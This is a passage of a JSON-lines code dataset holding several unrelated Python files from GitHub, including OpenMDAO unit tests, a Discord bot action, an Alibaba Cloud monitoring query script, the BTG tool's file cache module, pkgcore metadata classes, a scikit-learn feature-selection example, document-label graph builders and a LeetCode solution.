3, 4])\n prob.driver.add_objective('rosen.f')\n\n prob.setup(check=False)\n\n # Make sure we can't do this\n with self.assertRaises(IndexError) as cm:\n prob.run()\n\n msg = \"Index for design var 'myparams.x' is out of bounds. \"\n msg += \"Requested index: [0 3 4], \"\n msg += \"shape: (4,).\"\n raised_error = str(cm.exception)\n raised_error = raised_error.replace('(4L,', '(4,')\n self.assertEqual(msg, raised_error)\n\n def test_index_error_messages_obj(self):\n\n prob = Problem()\n prob.root = Group()\n prob.root.deriv_options['type'] = 'fd'\n prob.root.ln_solver.options['mode'] = 'auto'\n\n prob.root.add('myparams', IndepVarComp('x', np.zeros(4)))\n prob.root.add('rosen', Rosenbrock(4))\n\n prob.root.connect('myparams.x', 'rosen.x')\n\n prob.driver = MySimpleDriver()\n prob.driver.add_desvar('myparams.x')\n prob.driver.add_objective('rosen.xxx', indices=[4])\n\n prob.setup(check=False)\n\n # Make sure we can't do this\n with self.assertRaises(IndexError) as cm:\n prob.run()\n\n msg = \"Index for objective 'rosen.xxx' is out of bounds. \"\n msg += \"Requested index: [4], \"\n msg += \"shape: (4,).\"\n raised_error = str(cm.exception)\n raised_error = raised_error.replace('(4L,', '(4,')\n self.assertEqual(msg, raised_error)\n\n def test_index_error_messages_con(self):\n\n prob = Problem()\n prob.root = Group()\n prob.root.deriv_options['type'] = 'fd'\n prob.root.ln_solver.options['mode'] = 'auto'\n\n prob.root.add('myparams', IndepVarComp('x', np.zeros(4)))\n prob.root.add('rosen', Rosenbrock(4))\n\n prob.root.connect('myparams.x', 'rosen.x')\n\n prob.driver = MySimpleDriver()\n prob.driver.add_desvar('myparams.x')\n prob.driver.add_constraint('rosen.xxx', upper=0.0, indices=[4])\n\n prob.setup(check=False)\n\n # Make sure we can't do this\n with self.assertRaises(IndexError) as cm:\n prob.run()\n\n msg = \"Index for constraint 'rosen.xxx' is out of bounds. \"\n msg += \"Requested index: [4], \"\n msg += \"shape: (4,).\"\n raised_error = str(cm.exception)\n raised_error = raised_error.replace('(4L,', '(4,')\n self.assertEqual(msg, raised_error)\n\n def test_add_duplicate(self):\n\n prob = Problem()\n root = prob.root = SellarDerivatives()\n\n prob.driver = MySimpleDriver()\n\n # For this test only assume the driver supports multiple objectives\n prob.driver.supports['multiple_objectives'] = True\n\n\n prob.driver.add_desvar('z', lower=-100.0, upper=100.0)\n\n prob.driver.add_objective('obj')\n prob.driver.add_constraint('con1', upper=0.0)\n\n # Add duplicate desvar\n with self.assertRaises(RuntimeError) as cm:\n prob.driver.add_desvar('z', lower=-50.0, upper=49.0)\n\n msg = \"Desvar 'z' already exists.\"\n raised_error = str(cm.exception)\n self.assertEqual(msg, raised_error)\n\n # Add duplicate constraint\n with self.assertRaises(RuntimeError) as cm:\n prob.driver.add_constraint('con1', upper=0.0)\n\n msg = \"Constraint 'con1' already exists.\"\n raised_error = str(cm.exception)\n self.assertEqual(msg, raised_error)\n\n # Add duplicate objective\n with self.assertRaises(RuntimeError) as cm:\n prob.driver.add_objective('obj')\n\n msg = \"Objective 'obj' already exists.\"\n raised_error = str(cm.exception)\n self.assertEqual(msg, raised_error)\n\n def test_unsupported_multiple_obj(self):\n prob = Problem()\n prob.root = SellarDerivatives()\n\n prob.driver = MySimpleDriver()\n prob.driver.add_desvar('z', lower=-100.0, upper=100.0)\n\n prob.driver.add_objective('obj')\n\n # Add duplicate objective\n with self.assertRaises(RuntimeError) as cm:\n prob.driver.add_objective('x')\n\n msg = \"Attempted to add multiple objectives to a driver that does not \" \\\n \"support multiple objectives.\"\n raised_error = str(cm.exception)\n self.assertEqual(msg, raised_error)\n\n def test_no_desvar_bound(self):\n\n prob = Problem()\n root = prob.root = SellarDerivatives()\n\n prob.driver = MySimpleDriver()\n prob.driver.add_desvar('z')\n\n prob.setup(check=False)\n\n meta = prob.driver._desvars['z']\n self.assertLess(meta['lower'], -1e12)\n self.assertGreater(meta['upper'], 1e12)\n\n def test_set_desvar_index(self):\n\n # This tests a feature added by kilojoules.\n\n prob = Problem()\n root = prob.root = Group()\n driver = prob.driver = ScaleAddDriverArray()\n\n root.add('p1', IndepVarComp('x', val=np.array([1.0, 1.0, 1.0, 1.0])),\n promotes=['*'])\n root.add('p2', IndepVarComp('y', val=np.array([1.0, 1.0, 1.0, 1.0])),\n promotes=['*'])\n root.add('constraint', ExecComp('con = x + y',\n x=np.array([1.0, 1.0, 1.0, 1.0]),\n y=np.array([1.0, 1.0, 1.0, 1.0]),\n con=np.array([1.0, 1.0, 1.0, 1.0])),\n promotes=['*'])\n\n driver.add_desvar('x', lower=np.array([-1e5, -1e5, -1e5, -1e5]),\n upper=np.array([1e25, 1e25, 1e25, 1e25]),\n adder=np.array([10.0, 100.0, 1000.0, 10000.0]),\n scaler=np.array([1.0, 2.0, 3.0, 4.0]))\n driver.add_objective('y', adder=np.array([10.0, 100.0, 1000.0, 10000.0]),\n scaler=np.array([1.0, 2.0, 3.0, 4.0]))\n driver.add_constraint('con', upper=np.zeros((4, )), adder=np.array([10.0, 100.0, 1000.0, 10000.0]),\n scaler=np.array([1.0, 2.0, 3.0, 4.0]))\n\n prob.setup(check=False)\n\n x = driver.get_desvars()['x'][2]\n assert_rel_error(self, x, (1.0+1000)*3, 1e-6)\n driver.set_desvar('x', 99.0, index=2)\n x = driver.get_desvars()['x'][2]\n assert_rel_error(self, x, 99.0, 1e-6)\n\n\nclass TestDeprecated(unittest.TestCase):\n def test_deprecated_add_param(self):\n with warnings.catch_warnings(record=True) as w:\n # Cause all warnings to always be triggered.\n warnings.simplefilter(\"always\")\n\n # Trigger a warning.\n p = Problem()\n p.driver.add_param('x', 1.0)\n\n self.assertEqual(len(w), 1)\n self.assertEqual(str(w[0].message),\n 'Driver.add_param() is deprecated. Use add_desvar() instead.')\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"OpenMDAO/OpenMDAO1","sub_path":"openmdao/core/test/test_driver_interface.py","file_name":"test_driver_interface.py","file_ext":"py","file_size_in_byte":26330,"program_lang":"python","lang":"en","doc_type":"code","stars":119,"dataset":"github-code","pt":"44"} +{"seq_id":"29232053584","text":"\"\"\"\n\nBy Allen Tao\nCreated at 2023/02/10 15:36\n\"\"\"\nfrom dotenv import load_dotenv\n\nload_dotenv(verbose=True)\n_data = {}\n\n\ndef create_test_client():\n from main import app\n\n return app.test_client()\n\n\nBASE_URL = 'http://localhost:5000'\nclient = create_test_client()\n","repo_name":"qiuying-rpa/console","sub_path":"tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"44"} +{"seq_id":"22522515615","text":"from fsmLogic.nodeClasses.actionTemplate import Action\nfrom fsmLogic.actionManager import ActionManager\nfrom fsmLogic.nodeClasses.inputs import ValueInput, EventOutput, ValueOutput\nfrom fsmLogic.nodeClasses.valueTypes import ValueType\n\n\n@ActionManager.actionclass\nclass GetChannel(Action):\n guildID = -1\n group = \"Values\"\n templID = 57\n inputs = [\n ValueInput(\"channel ID\", ValueType.Number)\n ]\n outputs = [\n ValueOutput(\"channel\", ValueType.Structure, \"id (Number)\\ncreated at (Datetime)\\nname (Text)\\nmention (Text)\\ncategory ID (Number)\")\n ]\n outEvents = [\n EventOutput(\"completed\"),\n EventOutput(\"error\")\n ]\n\n def __init__(self):\n super().__init__()\n super().addConnections(self.__class__.inputs, self.__class__.outputs, self.__class__.outEvents)\n\n async def execute(self, client, guild):\n values = super().getValues()\n super().checkValues(values)\n from Bot.utils import formatChannel\n import datetime\n ch = guild.get_channel(values[0])\n if not ch:\n client.errMsg[guild.id] = \"[GetChannel - \" + datetime.datetime.now().strftime(\"%m/%d/%Y, %H:%M:%S\") + \"] Could not find channel\"\n return super().sendEvent(1)\n super().setValue(formatChannel(ch), 0)\n return super().sendEvent(0)\n\n @classmethod\n def getTemplate(cls):\n return super().getTemplate(cls)\n","repo_name":"AsperTheDog/NeoSkeletonBot","sub_path":"backend/fsmLogic/actionCodes/action_getChannel.py","file_name":"action_getChannel.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"6392315200","text":"#!/usr/bin/env python\n#coding=utf-8\nimport sys\nfrom aliyunsdkcore.client import AcsClient\nfrom aliyunsdkcore.acs_exception.exceptions import ClientException\nfrom aliyunsdkcore.acs_exception.exceptions import ServerException\nfrom aliyunsdkcms.request.v20190101.DescribeSiteMonitorDataRequest import DescribeSiteMonitorDataRequest\nimport json\n\n\nclient = AcsClient('<accessKey>',\n '<accessSecret>', 'cn-hangzhou')\n\n# We monitored over the weekend (Sat and Sun)\ndef DescribeSiteMonitorData (taskId, metricName):\n request = DescribeSiteMonitorDataRequest()\n request.set_accept_format('json')\n request.set_MetricName(metricName)\n request.set_TaskId(taskId)\n request.set_StartTime(\"2021-03-06T00:00:00Z\")\n request.set_EndTime(\"2021-03-07T23:59:59Z\")\n response = client.do_action_with_exception(request)\n return response \n\n\n\nGaResponse = DescribeSiteMonitorData('ce8f0758-90ca-4436-8de0-e5bdac023b58', 'ResponseTime')\nGaAvailability = DescribeSiteMonitorData('ce8f0758-90ca-4436-8de0-e5bdac023b58', 'Availability') \nInternetResponse = DescribeSiteMonitorData('d4ea0e26-a227-4006-8bad-0781556000b3', 'ResponseTime')\nInternetAvailability = DescribeSiteMonitorData('d4ea0e26-a227-4006-8bad-0781556000b3', 'Availability')\n\n#Response time\ndef getResponse(ResponseData):\n parse = json.loads(ResponseData)\n parseResponse = parse.get('Data')\n res = []\n for list in parseResponse:\n res.append(list.get('Average'))\n \n print(sum(res)/len(res))\n res = []\n\n\n# Availability\ndef getAvailability(AvailabilityData):\n parse1 = json.loads(AvailabilityData)\n parseAvailability = parse1.get('Data')\n ava = []\n for list in parseAvailability:\n ava.append(list.get('Availability'))\n print(sum(ava)/len(ava))\n ava = []\n \n# MaxResponse\ndef getMaxResponse(ResponseData):\n parse = json.loads(ResponseData)\n parseResponse = parse.get('Data')\n maximum = []\n for list in parseResponse:\n maximum.append(list.get('Average'))\n print(max(maximum))\n res = []\n\n# MinResponse\ndef getMinResponse(ResponseData):\n parse = json.loads(ResponseData)\n parseResponse = parse.get('Data')\n minimum = []\n for list in parseResponse:\n minimum.append(list.get('Average'))\n print(min(minimum))\n res = []\n \n# Get GA avg/max/min response time\ngetResponse(GaResponse)\ngetMaxResponse(GaResponse)\ngetMinResponse(GaResponse)\n\n# Get Internet avg/max/min response time\ngetResponse(InternetResponse)\ngetMaxResponse(InternetResponse)\ngetMinResponse(InternetResponse)\n\n# Get GA and Internet availablity\ngetAvailability(GaAvailability)\ngetAvailability(InternetAvailability)\n","repo_name":"alibabacloudkorea/ACKC","sub_path":"cms_sitemonitoring_query.py","file_name":"cms_sitemonitoring_query.py","file_ext":"py","file_size_in_byte":2566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"11806682730","text":"from os import chmod, mkdir, makedirs, remove, stat\nfrom os.path import exists, isdir\nfrom requests.exceptions import ConnectionError, ReadTimeout\nfrom time import mktime\nimport datetime\nimport requests\nimport sys\n\nfrom BTG.lib.config_parser import Config\nfrom BTG.lib.io import module as mod\n\n\nclass Cache:\n def __init__(self, module_name, url, filename, search_method):\n self.config = Config.get_instance()\n self.module_name = module_name\n self.url = url\n self.filename = self.new_filename = filename\n self.temp_folder = \"%s%s/\" % (self.config[\"temporary_cache_path\"], self.module_name)\n position = 0\n filename_copy = self.filename\n if not self.filename.isalnum():\n filename_copy = self.filename.replace(\"_\", \"\")\n for pos, char in enumerate(filename_copy):\n if not char.isalnum() and char != '.':\n position = pos\n self.new_filename = filename_copy[position:]\n self.temp_file = \"%s%s\" % (self.temp_folder, self.new_filename)\n\n self.createModuleFolder()\n if self.checkIfNotUpdate():\n if mod.allowedToSearch(search_method):\n self.downloadFile()\n else:\n raise NameError(\"Offline parameter is set on, cannot refresh outdated cache\")\n return None\n self.content = self.getContent()\n\n def getContent(self):\n f = \"\"\n if exists(self.temp_file):\n try:\n f = open(self.temp_file, encoding=\"ISO-8859-1\").read()\n except:\n f = open(self.temp_file).read()\n return f\n\n def downloadFile(self):\n \"\"\"\n Get file from web\n \"\"\"\n mod.display(\"%s.cache\" % self.module_name,\n message_type=\"DEBUG\",\n string=\"Update %s%s\" % (self.url, self.filename))\n full_url = \"%s%s\" % (self.url, self.filename)\n try:\n r = requests.get(\n full_url,\n stream=True, headers=self.config[\"user_agent\"],\n proxies=self.config[\"proxy_host\"],\n timeout=self.config[\"requests_timeout\"]\n )\n except ConnectionError as e:\n mod.display(\"%s.cache\" % self.module_name,\n message_type=\"ERROR\",\n string=e)\n return\n except ReadTimeout as e:\n mod.display(\"%s.cache\" % self.module_name,\n message_type=\"ERROR\",\n string=\"Timeout: %s\" % (full_url))\n return\n except:\n raise\n if r.status_code == 200:\n if not exists(\"%s.lock\" % self.temp_file):\n open(\"%s.lock\" % self.temp_file, 'a').close()\n chmod(\"%s.lock\" % self.temp_file, 0o666)\n if exists(self.temp_file):\n to_chmod = False\n else:\n to_chmod = True\n with open(self.temp_file, 'wb') as f:\n for chunk in r:\n f.write(chunk)\n if to_chmod:\n chmod(self.temp_file, 0o666)\n try:\n remove(\"%s.lock\" % self.temp_file)\n except:\n raise\n elif self.module_name == \"malshare\" and r.status_code == 404:\n # When we have a 404 from malshare it is a valid negative response\n raise NameError('Hash not found on malshare, it is alright')\n else:\n raise ValueError(r.status_code)\n # mod.display(\"%s.cache\" % self.module_name,\n # \"ERROR\",\n # \"Response code: %s | %s\" % (r.status_code, full_url))\n\n def checkIfNotUpdate(self):\n \"\"\"\n True: Need to be updated\n False: Nothing to do\n \"\"\"\n if exists(self.temp_file):\n if not self.compareUpdatedDate():\n return False\n return True\n\n def compareUpdatedDate(self):\n \"\"\"\n Compare date now and edited date\n \"\"\"\n if self.config[\"temporary_cache_update\"] <= 0:\n return False\n date_to_compare = datetime.datetime.now() - datetime.timedelta(seconds=self.config[\"temporary_cache_update\"]*60)\n last_update = stat(self.temp_file).st_mtime\n if last_update < int(mktime(date_to_compare.timetuple())):\n # Need to update\n return True\n # Don't need\n return False\n\n def createModuleFolder(self):\n if not isdir(self.config[\"temporary_cache_path\"]):\n try:\n makedirs(self.config[\"temporary_cache_path\"])\n except:\n mod.display(\"%s.cache\" % self.module_name,\n \"FATAL_ERROR\",\n \"Unable to create %s directory. (Permission denied)\" % self.config[\"temporary_cache_path\"])\n sys.exit()\n chmod(self.config[\"temporary_cache_path\"], 0o770)\n if not isdir(self.temp_folder):\n mkdir(self.temp_folder)\n chmod(self.temp_folder, 0o770)\n","repo_name":"conix-security/BTG","sub_path":"BTG/lib/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":5164,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"44"} +{"seq_id":"12664386453","text":"__all__ = (\"DeriveMetadataKls\", \"factory\", \"package\")\n\nfrom snakeoil import klass, weakrefs\n\nfrom pkgcore.ebuild import cpv\nfrom pkgcore.ebuild.atom import atom\nfrom pkgcore.package import base\n\n\ndef DeriveMetadataKls(original_kls):\n if getattr(original_kls, \"_derived_metadata_kls\", False):\n return original_kls\n\n class package(original_kls):\n _derived_metadata_kls = True\n built = False\n __slots__ = (\"_parent\", \"data\")\n try:\n __doc__ = \"package class with metadata bound to it for attribute \" \\\n \"generation\\n\\n\" + \\\n \"\\n\".join(x.lstrip()\n for x in original_kls.__doc__.split(\"\\n\")\n if \":ivar\" in x or \":cvar\" in x)\n __doc__ += \"\\n:ivar repo: parent repository\"\n except AttributeError:\n # wee, must be in -OO mode.\n __doc__ = None\n\n immutable = True\n package_is_real = True\n\n _get_attr = dict(original_kls._get_attr)\n\n def __init__(self, parent_repository, *a, **kwds):\n \"\"\"\n wrapper for %s.__init__; see %s.__init__ for allowed args/kwds,\n they're passed directly to it\n\n :param parent_repository: parent repository this package belongs to\n :type parent_repository: :obj:`pkgcore.repository.prototype.tree`\n instance\n \"\"\" % (original_kls, original_kls)\n original_kls.__init__(self, *a, **kwds)\n object.__setattr__(self, \"_parent\", parent_repository)\n\n def _get_data(self):\n \"\"\"\n internal hook func to get the packages metadata, consumer\n of :obj:`_get_attr`\n \"\"\"\n return self._fetch_metadata()\n _get_attr[\"data\"] = _get_data\n\n __getattr__ = base.dynamic_getattr_dict\n\n repo = klass.alias_attr(\"_parent._parent_repo\")\n\n def release_cached_data(self, all=False):\n for x in self._get_attr:\n try:\n object.__delattr__(self, x)\n except AttributeError:\n pass\n\n if all:\n try:\n object.__delattr__(self, 'data')\n except AttributeError:\n pass\n\n @property\n def slotted_atom(self):\n return atom(\"%s:%s\" % (self.key, self.slot))\n\n def _fetch_metadata(self):\n \"\"\"\n pull the metadata for this package.\n must be overridden in derivative\n \"\"\"\n raise NotImplementedError\n\n def add_format_triggers(self, op_inst, format_op_inst, engine_inst):\n pass\n\n return package\n\npackage = DeriveMetadataKls(cpv.versioned_CPV_cls)\n\nclass factory(object):\n\n \"\"\"\n package generator\n\n does weakref caching per repository\n\n :cvar child_class: callable to generate packages\n \"\"\"\n\n child_class = package\n\n def __init__(self, parent_repo):\n self._parent_repo = parent_repo\n self._cached_instances = weakrefs.WeakValCache()\n\n def new_package(self, *args):\n \"\"\"\n generate a new package instance\n\n \"\"\"\n inst = self._cached_instances.get(args)\n if inst is None:\n inst = self._cached_instances[args] = self.child_class(self, *args)\n return inst\n\n def __call__(self, *args, **kwds):\n return self.new_package(*args, **kwds)\n\n def clear(self):\n \"\"\"\n wipe the weakref cache of packages instances\n \"\"\"\n self._cached_instances.clear()\n\n def _get_metadata(self, *args):\n \"\"\"Pulls metadata from the repo/cache/wherever.\n\n Must be overridden in derivatives.\n \"\"\"\n raise NotImplementedError\n\n def _update_metadata(self, *args):\n \"\"\"Updates metadata in the repo/cache/wherever.\n\n Must be overridden in derivatives.\"\"\"\n raise NotImplementedError\n","repo_name":"pombreda/pkgcore","sub_path":"pkgcore/package/metadata.py","file_name":"metadata.py","file_ext":"py","file_size_in_byte":3945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"74928964934","text":"from sklearn.datasets import make_classification\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.feature_selection import SelectKBest\n\n# Criacao do conjunto de dados\nX, Y = make_classification(n_samples=1000, n_informative=10,\n n_redundant=10, random_state=42) # usa o random state para usar a mesma base de dados, nao aleatorio\n\n# Classificador Arvore de Decisao\narvore = DecisionTreeClassifier(random_state=42, max_depth=7)\n\n# Classificacao de Dados Originais\narvore.fit(X, Y)\nacuracia = arvore.score(X, Y)\nprint('Numero de atributos originais: ', X.shape[1])\nprint('Acuracia (dados originais): ', acuracia)\n\n# Aplicacao do PCA\nselecionador = SelectKBest(k=10) # numero de atributos que quer reduzir\nX = selecionador.fit_transform(X, Y)\n\n# Classificacao dos dados PCA\narvore.fit(X, Y)\nacuracia = arvore.score(X, Y)\nprint('\\nNumero de atributos selecionados: ', X.shape[1])\nprint('Acuracia (apos selecao):', acuracia)","repo_name":"area-41/Mineracao_de_Dados","sub_path":"PreProcessamento/ReducaoDimSelectKBest.py","file_name":"ReducaoDimSelectKBest.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"18623107845","text":"\nfrom doc.models import Rahbari, RahbariGraph, RahbariGraphType, RahbariLabel\nimport numpy as np\nimport after_response\n\nlabel_node_color = \"#009999\"\ndocument_node_color = \"#00CC66\"\n\n@after_response.enable\ndef apply():\n # CoLabelsGraph()\n # DocumentLabelGraph()\n DocumentDocumentGraph()\n print(\"Done...\")\n\n\ndef CoLabelsGraph():\n graph_name = \"گراف باهم‌آیی برچسب‌ها\"\n graph_en_name = \"CoLabelsGraph\"\n RahbariGraph.objects.filter(type__en_name=graph_en_name).delete()\n RahbariGraphType.objects.filter(en_name=graph_en_name).delete()\n\n graph_type = RahbariGraphType.objects.create(name=graph_name, en_name=graph_en_name)\n\n rahbari_document_list = Rahbari.objects.all()\n labels_dict = {}\n b = 0\n for doc in rahbari_document_list:\n print(\"1.1.\", b/rahbari_document_list.__len__())\n doc_labels = doc.labels.split(\"؛ \")\n for label in doc_labels:\n if len(label.replace(\" \", \"\")) > 0:\n label = label.replace('؛', '').replace(\"ائمه جمعه\", \"ائمه‌ جمعه\").replace(\"ورزش‌کاران\", \"ورزشکاران\")\n try:\n label_object = RahbariLabel.objects.get(name=label)\n label_name = label_object.name\n label_id = label_object.id\n label = str(label_id) + \"_\" + label_name\n if label not in labels_dict:\n labels_dict[label] = [doc.id]\n else:\n labels_dict[label].append(doc.id)\n except:\n print(label)\n b+=1\n\n\n labels_list = list(labels_dict.keys())\n\n added_node = []\n nodes_data = []\n added_edge = []\n edges_data = []\n max_weight = 0\n for i in range(labels_list.__len__()):\n print(\"1.2.\", i/labels_list.__len__())\n label1 = labels_list[i]\n label1_id, label1_name = label1.split(\"_\")[0], label1.split(\"_\")[1]\n label1_doc_list = labels_dict[label1]\n for j in range(i+1, labels_list.__len__()):\n label2 = labels_list[j]\n label2_id, label2_name = label2.split(\"_\")[0], label2.split(\"_\")[1]\n label2_doc_list = labels_dict[label2]\n\n common_doc = list(set(label1_doc_list) & set(label2_doc_list))\n\n if common_doc.__len__() > 0:\n node1 = {\"id\": \"label_\" + label1_id, \"name\": label1_name, \"node_type\": \"label\", \"style\": {\"fill\": label_node_color}}\n node2 = {\"id\": \"label_\" + label2_id, \"name\": label2_name, \"node_type\": \"label\", \"style\": {\"fill\": label_node_color}}\n weight = common_doc.__len__()\n edge_id = str(label1_id) + \"_\" + str(label2_id)\n edge = {\"id\": edge_id, \"source\": \"label_\" + label1_id, \"source_name\": label1_name, \"source_type\": \"label\",\n \"target\": \"label_\" + label2_id, \"target_name\": label2_name, \"target_type\": \"label\", \"weight\": weight}\n\n if label1_id not in added_node:\n added_node.append(label1_id)\n nodes_data.append(node1)\n\n if label2_id not in added_node:\n added_node.append(label2_id)\n nodes_data.append(node2)\n\n\n if [label1_id, label2_id] not in added_edge and [label2_id, label1_id] not in added_edge:\n added_edge.append([label1_id, label2_id])\n edges_data.append(edge)\n\n\n if weight >= max_weight:\n max_weight = weight\n\n RahbariGraph.objects.create(type=graph_type, nodes_data=nodes_data, edges_data=edges_data)\n\n i = 1\n weight_list = []\n while i < max_weight:\n weight_list.append(str(i))\n\n if i < 5:\n i += 1\n else:\n i += 10\n\n\n histogram_list = []\n for w in weight_list:\n weight = int(w)\n histogram_count = list(filter(lambda x: x[\"weight\"] >= weight, edges_data)).__len__()\n histogram_list.append({\"key\": w, \"count\": histogram_count})\n\n graph_type.max_weight = max_weight\n graph_type.weight_list = \",\".join(weight_list)\n graph_type.save()\n graph_type.histogram_data = histogram_list\n graph_type.save()\n graph_type.histogram_title = \"توزیع باهم‌آیی برچسب‌ها براساس اسناد مشترک\"\n graph_type.save()\n graph_type.is_label = 1\n graph_type.save()\n\n\ndef DocumentLabelGraph():\n graph_name = \"گراف میان سند و برچسب\"\n graph_en_name = \"DocumentLabelGraph\"\n RahbariGraph.objects.filter(type__en_name=graph_en_name).delete()\n RahbariGraphType.objects.filter(en_name=graph_en_name).delete()\n\n graph_type = RahbariGraphType.objects.create(name=graph_name, en_name=graph_en_name)\n\n rahbari_document_list = Rahbari.objects.all()\n\n added_node = []\n nodes_data = []\n added_edge = []\n edges_data = []\n b = 0\n for doc in rahbari_document_list:\n print(\"2.\", b/rahbari_document_list.__len__())\n document_name = doc.document_name\n document_id = str(doc.document_id.id)\n document_shape = \"rect\"\n\n node1 = {\"id\": \"document_\" + document_id, \"name\": document_name, \"node_type\": \"document\", \"type\": document_shape, \"size\": 20,\n \"style\": {\"fill\": document_node_color}}\n nodes_data.append(node1)\n\n doc_labels = doc.labels.split(\"؛ \")\n for label in doc_labels:\n if len(label.replace(\" \", \"\")) > 0:\n label = label.replace('؛', '').replace(\"ائمه جمعه\", \"ائمه‌ جمعه\").replace(\"ورزش‌کاران\", \"ورزشکاران\")\n try:\n label_object = RahbariLabel.objects.get(name=label)\n label_name = label_object.name\n label_id = str(label_object.id)\n\n node2 = {\"id\": \"label_\" + label_id, \"name\": label_name, \"node_type\": \"label\", \"style\": {\"fill\": label_node_color}}\n\n if label_id not in added_node:\n added_node.append(label_id)\n nodes_data.append(node2)\n\n weight = 1\n edge_id = str(document_id) + \"_\" + str(label_id)\n edge = {\"id\": edge_id, \"source\": \"document_\" + document_id, \"source_name\": document_name, \"source_type\": \"document\",\n \"target\": \"label_\" + label_id, \"target_name\": label_name, \"target_type\": \"label\", \"weight\": weight}\n\n if [document_id, label_id] not in added_edge and [label_id, document_id] not in added_edge:\n added_edge.append([document_id, label_id])\n edges_data.append(edge)\n\n except:\n print(label)\n b += 1\n\n RahbariGraph.objects.create(type=graph_type, nodes_data=nodes_data, edges_data=edges_data)\n\n graph_type.max_weight = 1\n graph_type.weight_list = \"1\"\n graph_type.save()\n graph_type.histogram_data = [{\"key\": 1, \"count\": edges_data.__len__()}]\n graph_type.save()\n graph_type.histogram_title = \"توزیع میان اسناد و برچسب‌ها\"\n graph_type.save()\n graph_type.is_label = 1\n graph_type.save()\n graph_type.is_document = 1\n graph_type.save()\n\n\ndef DocumentDocumentGraph():\n graph_name = \"گراف برچسب‌های میان اسناد\"\n graph_en_name = \"DocumentDocumentGraph\"\n RahbariGraph.objects.filter(type__en_name=graph_en_name).delete()\n RahbariGraphType.objects.filter(en_name=graph_en_name).delete()\n\n graph_type = RahbariGraphType.objects.create(name=graph_name, en_name=graph_en_name)\n\n\n rahbari_labels = RahbariLabel.objects.all()\n rahbari_labels_name_dict = {}\n rahbari_labels_id_dict = {}\n\n for row in rahbari_labels:\n rahbari_labels_name_dict[row.name] = str(row.id)\n rahbari_labels_id_dict[str(row.id)] = row.name\n\n rahbari_document_list = Rahbari.objects.all()\n rahbari_document_labels = {}\n rahbari_document_names = {}\n for i in range(rahbari_document_list.__len__()):\n print(\"3.1\", i/rahbari_document_list.__len__())\n document_id = str(rahbari_document_list[i].document_id.id)\n document_name = str(rahbari_document_list[i].document_id.name)\n rahbari_document_names[document_id] = document_name\n doc1_labels = rahbari_document_list[i].labels.split(\"؛ \")\n doc1_labels_ids = []\n for lbl in doc1_labels:\n try:\n lbl = lbl.replace('؛', '').replace(\"ائمه جمعه\", \"ائمه‌ جمعه\").replace(\"ورزش‌کاران\", \"ورزشکاران\")\n lbl_id = rahbari_labels_name_dict[lbl]\n doc1_labels_ids.append(lbl_id)\n except Exception as e:\n pass\n\n rahbari_document_labels[document_id] = doc1_labels_ids\n\n\n nodes_data = []\n added_edge = []\n edges_data = []\n max_weight = 0\n\n\n doc_id_list = list(rahbari_document_labels.keys())\n\n for i in range(doc_id_list.__len__()):\n print(\"3.2\", i / doc_id_list.__len__())\n document1_id = doc_id_list[i]\n document1_name = rahbari_document_names[document1_id]\n document1_labels = rahbari_document_labels[document1_id]\n document1_shape = \"rect\"\n node1 = {\"id\": \"document_\" + document1_id, \"name\": document1_name, \"node_type\": \"document\", \"type\": document1_shape, \"size\": 20,\n \"style\": {\"fill\": document_node_color}}\n nodes_data.append(node1)\n\n for j in range(i+1, doc_id_list.__len__()):\n document2_id = doc_id_list[j]\n document2_name = rahbari_document_names[document2_id]\n document2_labels = rahbari_document_labels[document2_id]\n\n common_labels = list(set(document1_labels) & set(document2_labels))\n\n weight = common_labels.__len__()\n\n if weight > 0:\n edge_id = str(document1_id) + \"_\" + str(document2_id)\n edge = {\"id\": edge_id, \"source\": \"document_\" + document1_id, \"source_name\": document1_name, \"source_type\": \"document\",\n \"target\": \"document_\" + document2_id, \"target_name\": document2_name, \"target_type\": \"document\",\n \"weight\": weight}\n\n if [document1_id, document2_id] not in added_edge and [document2_id, document1_id] not in added_edge:\n added_edge.append([document1_id, document2_id])\n edges_data.append(edge)\n\n if weight >= max_weight:\n max_weight = weight\n\n RahbariGraph.objects.create(type=graph_type, nodes_data=nodes_data, edges_data=edges_data)\n\n step = 2\n weight_list = []\n histogram_list = []\n for i in range(1, max_weight, step):\n inc = i\n weight_list.append(str(inc))\n histogram_count = list(filter(lambda x: x[\"weight\"] >= inc, edges_data)).__len__()\n histogram_list.append({\"key\": inc, \"count\": histogram_count})\n\n graph_type.max_weight = max_weight\n graph_type.weight_list = \",\".join(weight_list)\n graph_type.save()\n graph_type.histogram_data = histogram_list\n graph_type.save()\n graph_type.histogram_title = \"توزیع اسناد براساس باهم‌آیی برچسب‌ها\"\n graph_type.save()\n graph_type.is_document = 1\n graph_type.save()\n","repo_name":"fatemeq/standard","sub_path":"scripts/Persian/RahabriGraph.py","file_name":"RahabriGraph.py","file_ext":"py","file_size_in_byte":11368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"17962500157","text":"# -*- coding: utf-8 -*-\n\"\"\"\n给定一个大小为 n 的数组,找到其中的众数。众数是指在数组中出现次数大于 ⌊ n/2 ⌋ 的元素。\n\n你可以假设数组是非空的,并且给定的数组总是存在众数。\n\n示例 1:\n\n输入: [3,2,3]\n输出: 3\n\n示例 2:\n\n输入: [2,2,1,1,1,2,2]\n输出: 2\n\n思路:排序找中位数 摩尔投票\n@author: xiaozuo\n\"\"\"\nclass Solution:\n def majorityElement(self, nums):\n return sorted(nums)[len(nums) // 2]\n\n\n # 摩尔投票法\n def mole(self, nums):\n tmp = nums[0]\n count = 1\n for i in range(1, len(nums)):\n if count == 0:\n tmp = nums[i]\n if nums[i]==tmp:\n count += 1\n else:\n count -= 1\n return 